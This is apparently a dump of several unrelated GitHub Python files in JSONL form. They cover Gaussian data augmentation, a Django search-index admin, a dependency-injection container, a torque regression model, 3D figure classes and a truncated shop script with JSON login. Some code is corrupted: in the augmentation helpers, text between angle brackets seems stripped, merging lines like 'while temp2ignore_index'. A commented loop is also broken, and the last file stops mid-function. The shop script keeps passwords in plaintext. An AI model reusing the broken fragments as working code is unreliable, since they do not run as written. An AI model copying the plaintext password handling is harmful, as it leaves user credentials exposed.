new=new.apply(lambda x: ((2.7182**(-((x-mean)**2)/(2*var)))/denom))\n df.iloc[:,index]=new\n return df\n\n\n#FROM ITERATION 4\n \n\"\"\"\nInput : \n takes array of values\nOutput : \n plot the function\n\"\"\"\ndef plot(s):\n count, bins, ignored = plt.hist(s, 30, normed=True)\n plt.show()\n\n\"\"\"\nInput : \n mu - mean\n sigma - standard deviation\n vals - how many values you want in that range\nOutput :\n return normally distributed sample\n\"\"\"\n\ndef gaussiansample(mu,sigma,vals): \n s = np.random.normal(mu, sigma, 1000)\n return s\n\ndef choose_random(lis):\n return random.choice(lis)\n\ndef augment_row_byvalue_single(data,ignore_index,times,std,sample_size,add_initial=False):\n a = data.copy()\n i = 0\n ans=0\n for i in range(len(data.columns)):\n if i>ignore_index:\n if not np.isnan(data.iat[0,i]):\n ans+=1\n temp2 = 0 \n s = gaussiansample(data.iat[0,i],std,sample_size)\n while temp2ignore_index:\n if not np.isnan(data.iat[0,i]):\n ans+=1\n s = gaussiansample(data.iat[0,i],std,sample_size)\n val = choose_random(s)\n 
temp.iat[0,i]=val\n data=data.append(temp)\n\n print(\"Found {} values in the row and augmented {} values\".format(ans,ans*times))\n #Include the first row i.e. the original data \n if add_initial:\n return data\n else:\n return data.iloc[1:] \n \ndef augment_column_byvalue_single(data,col_index,times,std,sample_size,add_initial=False):\n new = pd.DataFrame()\n if add_initial:\n new = new.append(data,ignore_index=True)\n if not np.isnan(data.iat[0,col_index]):\n s = gaussiansample(data.iat[0,col_index],std,sample_size)\n for i in range(times):\n temp = data.copy()\n val = choose_random(s)\n temp.iat[0,col_index]=val\n new = new.append(temp,ignore_index=True)\n return new \n\n#Return top n indexs based on value\ndef get_top_n(lis,num):\n return sorted(range(len(lis)), key=lambda i: lis[i], reverse=True)[:num]\n\n#Return all the subsets of list except the blank one and itself\ndef subsets(lis):\n from itertools import chain, combinations\n def all_subsets(ss):\n return chain(*map(lambda x: combinations(ss, x), range(0, len(ss)+1)))\n comb = []\n for subset in all_subsets(lis):\n if len(subset)!=0 and len(subset)!=1:\n comb.append(subset)\n return comb\n\n#Takes tuple of string and convert them into list\ndef convertstrtolist(a):\n a=a.replace(\"(\",\"\")\n a=a.replace(\")\",\"\")\n a=a.split(\",\")\n lis=[]\n for i in a:\n lis.append(int(i))\n return lis\n \n\n#DUMPING THE DATA INTO DATA FOLDER\ndef savefile(data,name):\n string = \"data/\"+name\n # open a file, where you ant to store the data\n file = open(string, 'wb')\n # dump information to that file\n pickle.dump(data, file)\n # close the file\n file.close()\n print(\"Success\")\n \ndef loadfile(name):\n string = 'data/'+name\n try:\n # open a file, where you stored the pickled data\n file = open(string, 'rb')\n # dump information to that file\n data = pickle.load(file)\n # close the file\n file.close()\n return data\n except:\n print(\"File not found\")\n\n\n \n","repo_name":"adityavyasbme/UCI_Individual_Research","sub_path":"global_functions.py","file_name":"global_functions.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27699069060","text":"import logging\nfrom datetime import datetime\nfrom difflib import SequenceMatcher\n\nimport requests\n\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.core.exceptions import PermissionDenied\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.shortcuts import render\n\nfrom kitsune.search import synonym_utils\nfrom kitsune.search.es_utils import (\n get_doctype_stats, get_indexes, delete_index, ES_EXCEPTIONS,\n get_indexable, CHUNK_SIZE, recreate_indexes, write_index, read_index,\n all_read_indexes, all_write_indexes)\nfrom kitsune.search.models import Record, get_mapping_types, Synonym\nfrom kitsune.search.tasks import (\n OUTSTANDING_INDEX_CHUNKS, index_chunk_task, reconcile_task,\n update_synonyms_task)\nfrom kitsune.search.utils import chunked, create_batch_id\nfrom kitsune.sumo.redis_utils import redis_client, RedisError\nfrom kitsune.wiki.models import Document, DocumentMappingType\n\n\nlog = logging.getLogger('k.es')\n\n\ndef handle_reset(request):\n \"\"\"Resets the redis scoreboard we use\n\n Why? The reason you'd want to reset it is if the system gets\n itself into a hosed state where the redis scoreboard says there\n are outstanding tasks, but there aren't. 
If you enter that state,\n this lets you reset the scoreboard.\n \"\"\"\n try:\n client = redis_client('default')\n client.set(OUTSTANDING_INDEX_CHUNKS, 0)\n except RedisError:\n log.warning('Redis not running. Can not check if there are '\n 'outstanding tasks.')\n return HttpResponseRedirect(request.path)\n\n\nclass DeleteError(Exception):\n pass\n\n\ndef handle_delete(request):\n \"\"\"Deletes an index\"\"\"\n index_to_delete = request.POST.get('delete_index')\n es_indexes = [name for (name, count) in get_indexes()]\n\n # Rule 1: Has to start with the ES_INDEX_PREFIX.\n if not index_to_delete.startswith(settings.ES_INDEX_PREFIX):\n raise DeleteError('\"%s\" is not a valid index name.' % index_to_delete)\n\n # Rule 2: Must be an existing index.\n if index_to_delete not in es_indexes:\n raise DeleteError('\"%s\" does not exist.' % index_to_delete)\n\n # Rule 3: Don't delete the default read index.\n # TODO: When the critical index exists, this should be \"Don't\n # delete the critical read index.\"\n if index_to_delete == read_index('default'):\n raise DeleteError('\"%s\" is the default read index.' % index_to_delete)\n\n # The index is ok to delete\n delete_index(index_to_delete)\n\n return HttpResponseRedirect(request.path)\n\n\nclass ReindexError(Exception):\n pass\n\n\ndef reindex_with_scoreboard(mapping_type_names):\n \"\"\"Reindex all instances of a given mapping type with celery tasks.\n\n This will use Redis to keep track of outstanding tasks so nothing\n gets screwed up by two jobs running at once.\n \"\"\"\n # TODO: If this gets fux0rd, then it's possible this could be\n # non-zero and we really want to just ignore it. Need the ability\n # to ignore it.\n try:\n client = redis_client('default')\n val = client.get(OUTSTANDING_INDEX_CHUNKS)\n if val is not None and int(val) > 0:\n raise ReindexError('There are %s outstanding chunks.' % val)\n\n # We don't know how many chunks we're building, but we do want\n # to make sure another reindex request doesn't slide in here\n # and kick off a bunch of chunks.\n #\n # There is a race condition here.\n client.set(OUTSTANDING_INDEX_CHUNKS, 1)\n except RedisError:\n log.warning('Redis not running. Can not check if there are '\n 'outstanding tasks.')\n\n batch_id = create_batch_id()\n\n # Break up all the things we want to index into chunks. This\n # chunkifies by class then by chunk size. Also generate\n # reconcile_tasks.\n chunks = []\n for cls, indexable in get_indexable(mapping_types=mapping_type_names):\n chunks.extend(\n (cls, chunk) for chunk in chunked(indexable, CHUNK_SIZE))\n\n reconcile_task.delay(cls.get_index(), batch_id,\n cls.get_mapping_type_name())\n\n chunks_count = len(chunks)\n\n try:\n client = redis_client('default')\n client.set(OUTSTANDING_INDEX_CHUNKS, chunks_count)\n except RedisError:\n log.warning('Redis not running. 
Can\\'t denote outstanding tasks.')\n\n for chunk in chunks:\n index = chunk[0].get_index()\n index_chunk_task.delay(index, batch_id, chunk)\n\n\ndef handle_recreate_index(request):\n \"\"\"Deletes an index, recreates it, and reindexes it.\"\"\"\n groups = [name.replace('check_', '')\n for name in request.POST.keys()\n if name.startswith('check_')]\n\n indexes = [write_index(group) for group in groups]\n recreate_indexes(indexes=indexes)\n\n mapping_types_names = [mt.get_mapping_type_name()\n for mt in get_mapping_types()\n if mt.get_index_group() in groups]\n reindex_with_scoreboard(mapping_types_names)\n\n return HttpResponseRedirect(request.path)\n\n\ndef handle_reindex(request):\n \"\"\"Caculates and kicks off indexing tasks\"\"\"\n mapping_type_names = [name.replace('check_', '')\n for name in request.POST.keys()\n if name.startswith('check_')]\n\n reindex_with_scoreboard(mapping_type_names)\n\n return HttpResponseRedirect(request.path)\n\n\ndef search(request):\n \"\"\"Render the admin view containing search tools\"\"\"\n if not request.user.has_perm('search.reindex'):\n raise PermissionDenied\n\n error_messages = []\n stats = {}\n\n if 'reset' in request.POST:\n try:\n return handle_reset(request)\n except ReindexError as e:\n error_messages.append(u'Error: %s' % e.message)\n\n if 'reindex' in request.POST:\n try:\n return handle_reindex(request)\n except ReindexError as e:\n error_messages.append(u'Error: %s' % e.message)\n\n if 'recreate_index' in request.POST:\n try:\n return handle_recreate_index(request)\n except ReindexError as e:\n error_messages.append(u'Error: %s' % e.message)\n\n if 'delete_index' in request.POST:\n try:\n return handle_delete(request)\n except DeleteError as e:\n error_messages.append(u'Error: %s' % e.message)\n except ES_EXCEPTIONS as e:\n error_messages.append('Error: {0}'.format(repr(e)))\n\n stats = None\n write_stats = None\n es_deets = None\n indexes = []\n outstanding_chunks = None\n\n try:\n # TODO: SUMO has a single ES_URL and that's the ZLB and does\n # the balancing. 
If that ever changes and we have multiple\n # ES_URLs, then this should get fixed.\n es_deets = requests.get(settings.ES_URLS[0]).json()\n except requests.exceptions.RequestException:\n pass\n\n stats = {}\n for index in all_read_indexes():\n try:\n stats[index] = get_doctype_stats(index)\n except ES_EXCEPTIONS:\n stats[index] = None\n\n write_stats = {}\n for index in all_write_indexes():\n try:\n write_stats[index] = get_doctype_stats(index)\n except ES_EXCEPTIONS:\n write_stats[index] = None\n\n try:\n indexes = get_indexes()\n indexes.sort(key=lambda m: m[0])\n except ES_EXCEPTIONS as e:\n error_messages.append('Error: {0}'.format(repr(e)))\n\n try:\n client = redis_client('default')\n outstanding_chunks = int(client.get(OUTSTANDING_INDEX_CHUNKS))\n except (RedisError, TypeError):\n pass\n\n recent_records = Record.uncached.order_by('-starttime')[:100]\n\n outstanding_records = (Record.uncached.filter(endtime__isnull=True)\n .order_by('-starttime'))\n\n index_groups = set(settings.ES_INDEXES.keys())\n index_groups |= set(settings.ES_WRITE_INDEXES.keys())\n\n index_group_data = [[group, read_index(group), write_index(group)]\n for group in index_groups]\n\n return render(\n request,\n 'admin/search_maintenance.html',\n {'title': 'Search',\n 'es_deets': es_deets,\n 'doctype_stats': stats,\n 'doctype_write_stats': write_stats,\n 'indexes': indexes,\n 'index_groups': index_groups,\n 'index_group_data': index_group_data,\n 'read_indexes': all_read_indexes,\n 'write_indexes': all_write_indexes,\n 'error_messages': error_messages,\n 'recent_records': recent_records,\n 'outstanding_records': outstanding_records,\n 'outstanding_chunks': outstanding_chunks,\n 'now': datetime.now(),\n 'read_index': read_index,\n 'write_index': write_index,\n })\n\n\nadmin.site.register_view('search-maintenance', view=search,\n name='Search - Index Maintenance')\n\n\ndef _fix_results(results):\n \"\"\"Fixes up the S results for better templating\n\n 1. extract the results_dict from the DefaultMappingType\n and returns that as a dict\n 2. turns datestamps into Python datetime objects\n\n Note: This abuses ElasticUtils DefaultMappingType by using\n the private _results_dict.\n\n \"\"\"\n results = [obj._results_dict for obj in results]\n for obj in results:\n # Convert datestamps (which are in seconds since epoch) to\n # Python datetime objects.\n for key in ('indexed_on', 'created', 'updated'):\n if key in obj and not isinstance(obj[key], datetime):\n obj[key] = datetime.fromtimestamp(int(obj[key]))\n return results\n\n\ndef index_view(request):\n requested_bucket = request.GET.get('bucket', '')\n requested_id = request.GET.get('id', '')\n last_20_by_bucket = None\n data = None\n\n bucket_to_model = dict(\n [(cls.get_mapping_type_name(), cls) for cls in get_mapping_types()])\n\n if requested_bucket and requested_id:\n # Nix whitespace because I keep accidentally picking up spaces\n # when I copy and paste.\n requested_id = requested_id.strip()\n\n # The user wants to see a specific item in the index, so we\n # attempt to fetch it from the index and show that\n # specifically.\n if requested_bucket not in bucket_to_model:\n raise Http404\n\n cls = bucket_to_model[requested_bucket]\n data = list(cls.search().filter(id=requested_id))\n if not data:\n raise Http404\n data = _fix_results(data)[0]\n\n else:\n # Create a list of (class, list-of-dicts) showing us the most\n # recently indexed items for each bucket. 
We only display the\n # id, title and indexed_on fields, so only pull those back from\n # ES.\n last_20_by_bucket = [\n (cls_name,\n _fix_results(cls.search().order_by('-indexed_on')[:20]))\n for cls_name, cls in bucket_to_model.items()]\n\n return render(\n request,\n 'admin/search_index.html',\n {'title': 'Index Browsing',\n 'buckets': [cls_name for cls_name, cls in bucket_to_model.items()],\n 'last_20_by_bucket': last_20_by_bucket,\n 'requested_bucket': requested_bucket,\n 'requested_id': requested_id,\n 'requested_data': data\n })\n\n\nadmin.site.register_view('search-index', view=index_view,\n name='Search - Index Browsing')\n\n\nclass HashableWrapper(object):\n def __init__(self, hashcode, obj):\n self.hashcode = hashcode\n self.obj = obj\n\n def __hash__(self):\n return hash(self.hashcode)\n\n def __eq__(self, obj):\n return self.hashcode == obj.hashcode\n\n def __unicode__(self):\n return repr(self.hashcode)\n\n __str__ = __unicode__\n __repr__ = __unicode__\n\n\ndef diff_it_for_realz(seq_a, seq_b):\n # In order to get a nice diff of the two lists that shows us what\n # has been updated in the db and has not been indexed in an easy\n # to parse way, we hash the items in each list on an (id, date)\n # tuple. That's used to produce the diff.\n #\n # This gets us really close to something that looks good, though\n # it'll probably have problems if it's changed in the db just\n # before midnight and gets indexed just after midnight--the hashes\n # won't match. It's close, though.\n seq_a = [\n HashableWrapper(\n (doc['id'], datetime.date(doc['indexed_on'])), doc)\n for doc in seq_a]\n seq_b = [\n HashableWrapper(\n (doc.id, datetime.date(doc.current_revision.reviewed)), doc)\n for doc in seq_b]\n\n opcodes = SequenceMatcher(None, seq_a, seq_b).get_opcodes()\n results = []\n\n for tag, i1, i2, j1, j2 in opcodes:\n if tag == 'equal':\n for i, j in zip(seq_a[i1:i2], seq_b[j1:j2]):\n results.append((i.obj, j.obj))\n elif tag == 'delete':\n # seq_a is missing things that seq_b has\n for j in seq_b[j1:j2]:\n results.append((None, j.obj))\n elif tag == 'insert':\n # seq_a has things seq_b is missing\n for i in seq_a[i1:i2]:\n results.append((i.obj, None))\n elif tag == 'replace':\n # Sort the items in this section by the datetime stamp.\n section = []\n for i in seq_a[i1:i2]:\n section.append((i.obj['indexed_on'], i.obj, None))\n for j in seq_b[j1:j2]:\n section.append((j.obj.current_revision.reviewed, None, j.obj))\n\n for ignore, i, j in sorted(section, reverse=1):\n results.append((i, j))\n\n return results\n\n\ndef troubleshooting_view(request):\n # Build a list of the most recently indexed 50 wiki documents.\n last_50_indexed = list(_fix_results(DocumentMappingType.search()\n .order_by('-indexed_on')[:50]))\n\n last_50_reviewed = list(Document.uncached\n .filter(current_revision__is_approved=True)\n .order_by('-current_revision__reviewed')[:50])\n\n diff_list = diff_it_for_realz(last_50_indexed, last_50_reviewed)\n\n return render(\n request,\n 'admin/search_troubleshooting.html',\n {'title': 'Index Troubleshooting',\n 'diffs': diff_list,\n })\n\n\nadmin.site.register_view('search-troubleshooting', view=troubleshooting_view,\n name='Search - Index Troubleshooting')\n\n\nclass SynonymAdmin(admin.ModelAdmin):\n list_display = ('id', 'from_words', 'to_words')\n list_display_links = ('id', )\n list_editable = ('from_words', 'to_words')\n ordering = ('from_words', 'id')\n\n\nadmin.site.register(Synonym, SynonymAdmin)\n\n\ndef synonym_editor(request):\n parse_errors = []\n all_synonyms = 
Synonym.uncached.all()\n\n if 'sync_synonyms' in request.POST:\n # This is a task. Normally we would call tasks asyncronously, right?\n # In this case, since it runs quickly and is in the admin interface,\n # the advantage of it being run in the request/response cycle\n # outweight the delay in responding. If this becomes a problem\n # we should make a better UI and make this .delay() again.\n update_synonyms_task()\n return HttpResponseRedirect(request.path)\n\n synonyms_text = request.POST.get('synonyms_text')\n if synonyms_text is not None:\n db_syns = set((s.from_words, s.to_words) for s in all_synonyms)\n\n try:\n post_syns = set(synonym_utils.parse_synonyms(synonyms_text))\n except synonym_utils.SynonymParseError as e:\n parse_errors = e.errors\n else:\n syns_to_add = post_syns - db_syns\n syns_to_remove = db_syns - post_syns\n\n for (from_words, to_words) in syns_to_remove:\n # This uses .get() because I want it to blow up if\n # there isn't exactly 1 matching synonym.\n (Synonym.uncached.get(from_words=from_words, to_words=to_words)\n .delete())\n\n for (from_words, to_words) in syns_to_add:\n Synonym(from_words=from_words, to_words=to_words).save()\n\n return HttpResponseRedirect(request.path)\n\n # If synonyms_text is not None, it came from POST, and there were\n # errors. It shouldn't be modified, so the error messages make sense.\n if synonyms_text is None:\n synonyms_text = '\\n'.join(unicode(s) for s in all_synonyms)\n\n synonym_add_count, synonym_remove_count = synonym_utils.count_out_of_date()\n\n return render(request, 'admin/search_synonyms.html', {\n 'synonyms_text': synonyms_text,\n 'errors': parse_errors,\n 'synonym_add_count': synonym_add_count,\n 'synonym_remove_count': synonym_remove_count,\n })\n\n\nadmin.site.register_view('synonym_bulk', view=synonym_editor,\n name='Search - Synonym Editor')\n","repo_name":"feer56/Kitsune1","sub_path":"kitsune/search/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":16878,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"37784470931","text":"\"\"\"Module containing project's application container.\"\"\"\nimport asyncio\n\nfrom dependency_injector import containers, providers\nfrom tornado.iostream import IOStream\nfrom tornado.tcpclient import TCPClient\n\nfrom src.back.handlers.create_room import CreateRoomHandler\nfrom src.back.handlers.join_room import JoinRoomHandler\nfrom src.back.handlers.ping import PingHandler\nfrom src.back.handlers.routing import RoutingHandler\nfrom src.back.interfaces.values.connection import ConnectionRegistry\nfrom src.back.io import IOConfig, MessagePrefixRegistry, MessageReader, MessageWriter\nfrom src.back.message.create_room import CreateRoomMessage\nfrom src.back.message.join_room import JoinRoomMessage\nfrom src.back.message.ping import PingMessage, PongMessage\nfrom src.back.notifier.notifier import Notification\nfrom src.back.room_registry import RoomRegistry\nfrom src.back.server import Server\nfrom src.cli.client import Client\n\n\nasync def init_client_stream(host: str, port: int) -> IOStream:\n \"\"\"Create stream for the given host/port.\"\"\"\n return await TCPClient().connect(host, port)\n\n\nclass ApplicationContainer(containers.DeclarativeContainer):\n \"\"\"Root container for the project dependencies.\"\"\"\n\n config = providers.Configuration()\n io_config = providers.Factory(\n IOConfig,\n max_message_size=config.MAX_MESSAGE_SIZE,\n message_prefix_size=config.MESSAGE_PREFIX_SIZE,\n 
message_length_size=config.MESSAGE_LENGTH_SIZE,\n )\n message_prefix_registry = providers.Factory(\n MessagePrefixRegistry,\n providers.Dict(\n {\n 1: PingMessage,\n 2: PongMessage,\n 3: CreateRoomMessage,\n 4: JoinRoomMessage,\n },\n ),\n )\n\n message_reader = providers.Factory(\n MessageReader,\n message_prefix_registry=message_prefix_registry,\n config=io_config,\n )\n message_writer = providers.Factory(\n MessageWriter,\n message_prefix_registry=message_prefix_registry,\n config=io_config,\n )\n\n room_registry = providers.Singleton(RoomRegistry, rooms_lock=asyncio.Lock())\n\n connection_registry = providers.Singleton(\n ConnectionRegistry,\n )\n\n notification = providers.Singleton(\n Notification,\n room_registry=room_registry,\n connection_registry=connection_registry,\n )\n\n ping_handler = providers.Factory(PingHandler, message_writer=message_writer, notifier=notification)\n\n create_room_handler = providers.Factory(\n CreateRoomHandler,\n room_registry=room_registry,\n notifier=notification,\n )\n\n join_room_handler = providers.Factory(\n JoinRoomHandler,\n room_registry=room_registry,\n notifier=notification,\n )\n\n routing_handler = providers.Factory(\n RoutingHandler,\n message_type_to_handlers=providers.Dict(\n {\n PingMessage: providers.List(ping_handler),\n CreateRoomMessage: providers.List(create_room_handler),\n JoinRoomMessage: providers.List(join_room_handler),\n },\n ),\n )\n\n server = providers.Factory(\n Server,\n message_reader=message_reader,\n message_writer=message_writer,\n message_handler=routing_handler,\n connection_registry=connection_registry,\n )\n event = providers.Factory(asyncio.Event)\n\n client_stream = providers.Resource(\n init_client_stream,\n host=config.HOST,\n port=config.PORT,\n )\n client = providers.Singleton(\n Client,\n stream=client_stream,\n message_reader=message_reader,\n message_writer=message_writer,\n )\n","repo_name":"WinterCitizen/roulette","sub_path":"src/back/containers/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26504453512","text":"import numpy as np\nimport scipy as sp\n\n\nclass TorqueModelV1:\n\n def optimize(self, df):\n initial_guess = np.zeros(7 * 2 + 1)\n initial_guess[-1] = 1\n coef = sp.optimize.minimize(self.err, initial_guess, args=(df))\n return [float(x) for x in coef.x]\n\n def err(self, betas, df):\n prediction = self.f(betas, df.iloc[:, df.columns != 'Torque'])\n expected = df['Torque'].to_numpy()\n\n err = (expected - prediction)\n RMSE = np.sqrt(np.mean(np.square(err)))\n\n return RMSE\n\n def calc_r2(self, betas, df):\n ''' Calculate the r squared value between the predicted and measured torque\n\n Args:\n betas (float[]): Coefficients of best fit\n ydata (Data Frame): Measured torque\n xdata (Data Frame): Data from muscles and joint angle\n Returns:\n r2 (float): r-squared measurement of prediction\n RMSE: root mean square error of prediction\n '''\n\n ydata = df['Torque']\n xdata = df.iloc[:, df.columns != 'Torque']\n\n err = (ydata - self.f(betas, xdata)).to_numpy()\n SSR = np.sum(np.square(err))\n norm = (ydata - np.mean(ydata)).to_numpy()\n SSN = np.sum(np.square(norm))\n\n RMSE = np.sqrt(SSR / xdata.iloc[:, 0].size)\n r2 = 1 - (SSR / SSN)\n\n return r2, RMSE\n\n @staticmethod\n def f(betas, X):\n JOINT_ANGLE = X.iloc[:, 0]\n TA = X.iloc[:, 1]\n GM = X.iloc[:, 2]\n SOL = X.iloc[:, 3]\n CONSTANT = np.ones(JOINT_ANGLE.size)\n\n f = (betas[0] * (TA - 
betas[1])).to_numpy() + (betas[2] * (TA * JOINT_ANGLE - betas[3])).to_numpy() \\\n + (betas[4] * (GM - betas[5])).to_numpy() + (betas[6] * (GM * JOINT_ANGLE - betas[7])).to_numpy() \\\n + (betas[8] * (SOL - betas[9])).to_numpy() + (betas[10] * (SOL * JOINT_ANGLE - betas[11])).to_numpy() \\\n + (betas[12] * (JOINT_ANGLE - betas[13])).to_numpy() \\\n + (betas[14] * CONSTANT)\n\n return f\n","repo_name":"daviddorf2023/mobile_hdemg_exo","sub_path":"mobile_hdemg_exo/src/mobile_hdemg_exo/model/torque_model_v1.py","file_name":"torque_model_v1.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1014879693","text":"# n=[0,9,5]\n# i=0\n# while i)]\n","repo_name":"jedi007/TestPyTorch","sub_path":"easyYoLoV7/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"13963315895","text":"from dataclasses import dataclass, field\nfrom abc import ABC\n\n\n@dataclass(frozen=False)\nclass SolidFigure(ABC):\n \"\"\"\n Abstract solid figure in 3D space. It is characterised by position in\n space and rotation along X,Y,Z axis in its own reference frame. Size of\n the figure (its extend in space) is defined in its subclasses.\n \"\"\"\n\n uuid: str = \"AAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA\"\n name: str = \"\"\n\n position: tuple[float, float, float] = field(default_factory=lambda: (0., 0., 0.))\n rotation: tuple[float, float, float] = field(default_factory=lambda: (0., 0., 0.))\n\n def expand(self, margin: float) -> None:\n \"\"\"Expand figure by `expansion` in each dimension.\"\"\"\n\n\n@dataclass(frozen=False)\nclass SphereFigure(SolidFigure):\n \"\"\"A sphere. Its size is defined by its radius.\"\"\"\n\n radius: float = 1.\n\n def expand(self, margin: float) -> None:\n \"\"\"Expand figure by `margin` in each dimension. Increases figure radius by adding to it a `margin`\"\"\"\n self.radius += margin\n\n\n@dataclass(frozen=False)\nclass CylinderFigure(SolidFigure):\n \"\"\"\n A cylinder, a cone or a truncated cone. It's defined by the radii of both of\n its bases(top and bottom) and height. A cone can be created by setting one\n of the radii to zero.\n \"\"\"\n\n radius_top: float = 1.\n radius_bottom: float = 1.\n height: float = 1.\n\n def expand(self, margin: float) -> None:\n \"\"\"\n Expand the figure by `margin` in each dimension.\n Increases figures height by 2 * `margin` (to achieve the same expansion by 1 * `margin` on the\n bottom and top side.\n Increase as well bottom and top radius by 1 * `margin`.\n \"\"\"\n self.radius_top += margin\n self.radius_bottom += margin\n self.height += margin * 2\n\n\n@dataclass(frozen=False)\nclass BoxFigure(SolidFigure):\n \"\"\"\n A rectangular box (cuboid). The figure can be rotated (meaning its walls don't have\n to be aligned with the axes of the coordinate system). 
The edge lengths are the final lengths of\n each edge, not the distance from the center of the figure (meaning they are full-size not half-size,\n for example: the edge lengths 1, 1, 1 will result in a 1 by 1 by 1 cube).\n \"\"\"\n\n x_edge_length: float = 1.\n y_edge_length: float = 1.\n z_edge_length: float = 1.\n\n def expand(self, margin: float) -> None:\n \"\"\"\n Expand the figure by `margin` in each dimension.\n Increases figures weight, depth and height by 2 * `margin` to achieve the same\n expansion (1 * `margin`) on each side.\n \"\"\"\n self.x_edge_length += margin * 2\n self.y_edge_length += margin * 2\n self.z_edge_length += margin * 2\n\n\ndef parse_figure(figure_dict: dict) -> SolidFigure:\n \"\"\"Parse json containing information about figure to figure.\"\"\"\n geometry_type = figure_dict['geometryData'].get('geometryType')\n if geometry_type in (\"CyliderGeometry\", \"HollowCylinderGeometry\"):\n return CylinderFigure(\n uuid=figure_dict[\"uuid\"],\n name=figure_dict[\"name\"],\n position=tuple(figure_dict[\"geometryData\"][\"position\"]),\n rotation=tuple(figure_dict[\"geometryData\"][\"rotation\"]),\n radius_top=figure_dict[\"geometryData\"]['parameters'][\"radius\"],\n radius_bottom=figure_dict[\"geometryData\"]['parameters'][\"radius\"],\n height=figure_dict[\"geometryData\"]['parameters'][\"depth\"],\n )\n if geometry_type == \"BoxGeometry\":\n return BoxFigure(\n uuid=figure_dict[\"uuid\"],\n name=figure_dict[\"name\"],\n position=tuple(figure_dict[\"geometryData\"][\"position\"]),\n rotation=tuple(figure_dict[\"geometryData\"][\"rotation\"]),\n y_edge_length=figure_dict[\"geometryData\"]['parameters'][\"height\"],\n x_edge_length=figure_dict[\"geometryData\"]['parameters'][\"width\"],\n z_edge_length=figure_dict[\"geometryData\"]['parameters'][\"depth\"],\n )\n if geometry_type == \"SphereGeometry\":\n return SphereFigure(\n uuid=figure_dict[\"uuid\"],\n name=figure_dict[\"name\"],\n position=tuple(figure_dict[\"geometryData\"][\"position\"]),\n rotation=tuple(figure_dict[\"geometryData\"][\"rotation\"]),\n radius=figure_dict[\"geometryData\"]['parameters'][\"radius\"],\n )\n print(f\"Invalid geometry of type \\\"{geometry_type}\\\" in figure \\\"{figure_dict.get('name')}\\\".\")\n raise ValueError(\n \"Geometry type must be either 'HollowCylinderGeometry', 'CylinderGeometry', 'BoxGeometry', or 'SphereGeometry'\")\n","repo_name":"yaptide/converter","sub_path":"converter/solid_figures.py","file_name":"solid_figures.py","file_ext":"py","file_size_in_byte":4596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"13958046032","text":"import json\nimport string\nimport random\nfrom json import JSONDecodeError\n\ndef Register(type,member_json_file,admin_json_file,Full_Name,Address,Email,Password):\n '''Register Function || Return True if registered successfully else False'''\n if type.lower()=='admin':\n f=open(admin_json_file,'r+')\n d={\n \"Full Name\":Full_Name,\n \"Address\":Address,\n \"Email\":Email,\n \"Password\":Password,\n }\n try:\n content=json.load(f)\n if d not in content:\n content.append(d)\n f.seek(0)\n f.truncate()\n json.dump(content,f)\n except JSONDecodeError:\n l=[]\n l.append(d)\n json.dump(l,f)\n f.close()\n return True\n elif type.lower()=='member':\n f=open(member_json_file,'r+')\n d={\n \"Full Name\":Full_Name,\n \"Address\":Address,\n \"Email\":Email,\n \"Password\":Password,\n }\n try:\n content=json.load(f)\n if d not in content:\n content.append(d)\n f.seek(0)\n f.truncate()\n 
json.dump(content,f)\n except JSONDecodeError:\n l=[]\n l.append(d)\n json.dump(l,f)\n f.close()\n return True\n else:\n return False\n\ndef Login(type,members_json_file,admin_json_file,Email,Password):\n '''Login Functionality || Return True if successfully logged in else False'''\n d=0\n if type.lower()=='admin':\n f=open(admin_json_file,'r+')\n else:\n f=open(members_json_file,'r+')\n try:\n content=json.load(f)\n except JSONDecodeError:\n return False\n for i in range(len(content)):\n if content[i][\"Email\"]==Email and content[i][\"Password\"]==Password:\n d=1\n break\n f.seek(0)\n f.truncate()\n json.dump(content,f)\n f.close()\n if d==0:\n return False\n return True\n\ndef AutoGenerate_ProductID():\n '''Return a autogenerated random product ID'''\n product_ID=''.join(random.choices(string.ascii_uppercase+string.digits,k=4))\n return product_ID\n\ndef AutoGenerate_OrderID():\n '''Return a autogenerated random product ID'''\n Order_ID=''.join(random.choices(string.ascii_uppercase+string.digits,k=3))\n return Order_ID\n\ndef Create_Product(owner,product_json_file,product_ID,product_name,manufacturer_name,price,discount,total_stock_available):\n '''Creating a product || Return True if successfully created else False'''\n product_data = {\n 'owner': owner,\n 'product_ID': product_ID,\n 'product_name': product_name,\n 'manufacturer_name': manufacturer_name,\n 'price': price,\n 'discount': discount,\n 'total_stock_available': total_stock_available\n }\n \n with open(product_json_file, 'r+') as f:\n product_json_data = json.load(f)\n \n if product_ID in product_json_data:\n print('Product with ID {} already exists!'.format(product_ID))\n return False\n product_json_data[product_ID] = product_data\n with open(product_json_file, 'w') as f:\n json.dump(product_json_data, f)\n \n print('Product created successfully!')\n return True\n\ndef Read_Products(owner,product_json_file):\n '''Reading Products created by the admin(owner)'''\n products=[]\n f=open(product_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n if content[i][\"owner\"]==owner:\n products.append(content[i])\n \n f.close()\n return products\n \n\ndef Read_Product_By_ID(product_json_file,product_ID,Details):\n '''Reading product by ID'''\n with open(product_json_file, 'r') as f:\n products = json.load(f)\n \n if product_ID not in products:\n print(f\"Product with ID {product_ID} does not exist.\")\n return None\n \n product = products[product_ID]\n if Details == 'all':\n return product\n elif Details in product:\n return product[Details]\n else:\n print(f\"Invalid details requested: {Details}\")\n return None\n\ndef Update_Product(product_json_file,product_ID,detail_to_be_updated,new_value):\n '''Updating Product || Return True if successfully updated else False'''\n\n f=open(product_json_file,'r+')\n content=json.load(f)\n for i in range(len(content)):\n 